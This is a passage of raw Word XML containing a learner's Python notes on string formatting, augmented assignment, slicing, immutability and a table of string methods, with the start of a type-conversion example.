        <w:t xml:space="preserve"> years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old'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.format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(name, age))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385444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A98A5E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specific order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D20F6B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'Hi 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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>new_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green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. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re 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{age}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> years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old'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.format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>new_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>=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'Sally'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age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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>70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4A5B0FC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D6FE83E" wp14:editId="492D9739">
            <wp:extent cx="2209800" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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3799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5DD02C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AC0737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41AA100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Augmented Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F781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4CCF8E6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4:28 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197FE02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F869B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augmented assignment operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC8D4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some_value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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C41FE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#some_value =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some_value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+ 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007BAB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augmented assignment operator += -= /= *=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393500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#some_value += 2 #7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457304C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#some_value *= 2 #10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BEC8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some_value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**= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#5**2 = 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE293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some_value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some_value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380474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B3C1569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50F338E" wp14:editId="6339C439">
            <wp:extent cx="3937000" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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3F1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C96A54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A4E70E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E4F046C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Complex (int float complex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869724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0052263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4:29 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A903789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9AF67C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complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192CF97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int float complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6AF83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binary number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC203D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bin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 xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#0b101 #google binary number of 5 =&gt; 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B2F0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Returning a binary number to a number based of 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8993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'0b101'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)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A426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7FE2FD9A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A299F4A" wp14:editId="69D0B8E4">
            <wp:extent cx="4546600" cy="1841500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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EB0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106FCBD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC240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D2F762A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String concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4FDA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4612D13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4:30 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF03E7C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99F44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String concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D7B2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string_concatenation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'Hello'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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' '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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Andrei'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB1AF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string_concatenation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236DA6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'type of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string_concatenation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string_concatenation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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D65D61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16D247E9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751E8F6" wp14:editId="6C62C895">
            <wp:extent cx="5461000" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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782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319861F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DF21D3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C5879F7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String indexing + Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394BB32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282592E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4:33 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44815B5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string-index.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199237E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F3764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#selfish = 'me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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490D9C5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'01234567'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34B7C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#01234567</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B7A9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#m 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B44F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#e 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78312AC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 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142913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#m 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA007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#e 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D80970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[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start:stop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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E60B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'm0e1 2m3'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341852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Will only get all the way to 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F05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[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start:stop:stepover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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABD6D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print(selfish[1:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DABE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1234567</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998A6C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'=========='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043867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[start=0:stop=4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698AA9C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:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#0123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0C8D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'=========='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E4659E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[start=0:stop=5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4567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>[: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 xml:space="preserve">]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#01234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6527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'=========='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2B5CE3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[start=0:stop=0:stepover=1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5A01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>[::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 xml:space="preserve">]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#01234567</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CACF4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[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start:stop:stepover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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F5AA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>[-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 xml:space="preserve">]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5431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'=========='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EAB5FF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Stepping over from the back with stepover=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E1AD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>[::-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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8913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'=========='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2D775B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Stepping over from the back with stepover=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB068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>[::-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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6533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'=========='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C73649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72A1BA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21E68ED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503429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'=========='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91EB5A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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'1'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7A2BD23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'WoW! This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is 1'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E2C35D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11A32E1" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00095B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  <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>immutability.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E9703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942D8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'01234567'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA448E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String slicing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D6EC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selfish[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start:stop:stepover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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEBBB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Immutability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D4B1B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String in Python are Immutable = Cannot be changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB205D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This will work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9776A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100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AED0B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488AD6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'01234567'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7039F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This does NOT work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D209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#selfish[0] = '8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86E7A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This works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171425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 xml:space="preserve"> += </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0109D8B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selfish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1CAF22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B821E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FF868A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7D416E0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Functions &amp; Built-ins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E766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54911DE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4:34 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3490D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32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https://docs.python.org/3/library/functions.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21A4655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AD1668B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4B5E435" wp14:editId="71008444">
            <wp:extent cx="4673600" cy="4749800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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C07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77F19C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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len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('hello')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420DAA6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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs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) counts from 1 (NOT 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E546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09F03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34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https://www.w3schools.com/python/python_ref_string.asp</w:t>
        </w:r>
      </w:hyperlink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92"/>
        <w:gridCol w:w="7214"/>
      </w:tblGrid>
      <w:tr w:rsidR="00233C26" w14:paraId="2B9F513C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50D879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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r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8D9524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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="3F7D4B73" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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FC2565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35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capitalize()</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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3348D0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Converts the first character to upper case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="498637EC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C4463B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36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casefold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8C71BE7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Converts string into lower case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="09F4253F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1C2BC1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37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center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C76ED7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 xml:space="preserve">Returns a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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centered</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="1C2AF29C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458E04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38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count()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662F21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the number of times a specified value occurs in a string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="6087EB45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AA1A8C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39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encode()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C93877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an encoded version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="629933B9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599F31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40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endswith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3CEE92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the string ends with the specified value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="4421DFB3" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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62347F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41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expandtabs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84C262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Sets the tab size of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="3A792417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8FB569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42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find()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F5FC0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Searches the string for a specified value and returns the position of where it was found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="75FC249A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6A49F1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43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format()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A37640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Formats specified values in a string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="37D6FBF4" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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15205A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proofErr w:type="spellStart"/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format_map</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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871900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Formats specified values in a string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="0857B14A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8C8925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44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index()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76318D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Searches the string for a specified value and returns the position of where it was found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="4EC16645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3906CD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45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isalnum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1C6B2AD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all characters in the string are alphanumeric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="569E62DA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C7D5395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46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isalpha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21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FC7843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all characters in the string are in the alphabet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="7F71B3F6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432E19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47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isascii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2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4C33F2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all characters in the string are ascii characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="10B5B468" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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11D788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48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isdecimal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F865D49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all characters in the string are decimals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="782325D0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D6A910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49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isdigit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72095E4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all characters in the string are digits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="3AD4306C" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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6EA288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50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isidentifier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5E32EA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the string is an identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="45297688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526AE9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51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islower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DC5804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all characters in the string are lower case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="6D56EA7A" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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B51A84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52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isnumeric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8C7355C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all characters in the string are numeric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="342DE99C" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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6E4547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53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isprintable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64917B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all characters in the string are printable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="5BEFE6FA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67DBEA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54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isspace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6C7C79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all characters in the string are whitespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="008789C7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7CE76E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55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istitle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C71BEF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the string follows the rules of a title</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="3414D2FB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BD449F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56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isupper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FE83D7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all characters in the string are upper case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="50435A14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EEB509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57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join()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A3E98B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 xml:space="preserve">Converts the elements of an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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iterable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> into a string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="614F3E87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E39046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58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ljust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22B38F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a left justified version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="4F15998B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81EA91F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59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lower()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4AC934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Converts a string into lower case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="2EF0F875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B0588B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60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lstrip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418751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a left trim version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="577D6A25" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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7865A9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61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maketrans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E0F756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a translation table to be used in translations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="214DB64D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5DE75C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62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partition()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8166B4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a tuple where the string is parted into three parts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="79B2B3D2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575BB6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63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replace()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B662BFF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a string where a specified value is replaced with a specified value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="689A24BE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A9657D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64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rfind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A76353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Searches the string for a specified value and returns the last position of where it was found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="01EED41F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8072B3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65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rindex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BD2985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Searches the string for a specified value and returns the last position of where it was found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="2218DDD3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4C65F4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66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rjust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7F0206E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a right justified version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="1544EFB9" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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02B488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67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rpartition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D486D2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a tuple where the string is parted into three parts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="7D8A67D6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AD3FFC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68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rsplit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7C6DBA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Splits the string at the specified separator, and returns a list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="620F79A4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BE72D4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69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rstrip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48130C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a right trim version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="4F0610AC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BA70F5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70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split()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8C1B74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Splits the string at the specified separator, and returns a list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="656859E9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BA8707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71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splitlines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DAEAA4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Splits the string at line breaks and returns a list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="0EE61680" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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F4E32A8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72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startswith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FA5044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true if the string starts with the specified value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="17E06D5E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BF9DF27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73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strip()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BF2ACEB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a trimmed version of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="2DB3077B" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="161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D07941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74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swapcase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C87EBE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Swaps cases, lower case becomes upper case and vice versa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="0317B0E1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32C5F6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75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title()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144C2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Converts the first character of each word to upper case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="2286F900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E95884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76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translate()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F5A350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Returns a translated string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="36E6908A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0B2CAC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77" w:history="1"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upper()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BD9AC0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Converts a string into upper case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233C26" w14:paraId="6FB4A8B5" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="30038029"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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43E156" w14:textId="77777777" w:rsidR="00233C26" w:rsidRPr="002B15E1" w:rsidRDefault="00233C26">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId78" w:history="1">
              <w:proofErr w:type="spellStart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zfill</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="002B15E1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                  <w:sz w:val="23"/>
                  <w:szCs w:val="23"/>
                </w:rPr>
                <w:t>()</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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9EB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5288CF7" w14:textId="77777777" w:rsidR="00233C26" w:rsidRPr="002B15E1" w:rsidRDefault="00233C26">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B15E1">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t>Fills the string with a specified number of 0 values at the beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00B924D0" w14:textId="77777777" w:rsidR="00233C26" w:rsidRPr="002B15E1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C5F92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AF54DB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FB2B83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65247A3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conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93056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3C42AA9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5:28 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498286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type-conversion.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53737A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81EAA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'Jedi'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1418F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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F28E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relationship_status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'single'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0157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relationship_status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'it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s complicated'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63FB8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'relationship_status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relationship_status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FB6261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birth_year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'What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year were you born? [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yyyy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]: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9E0205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2024</w:t>
      </w:r>
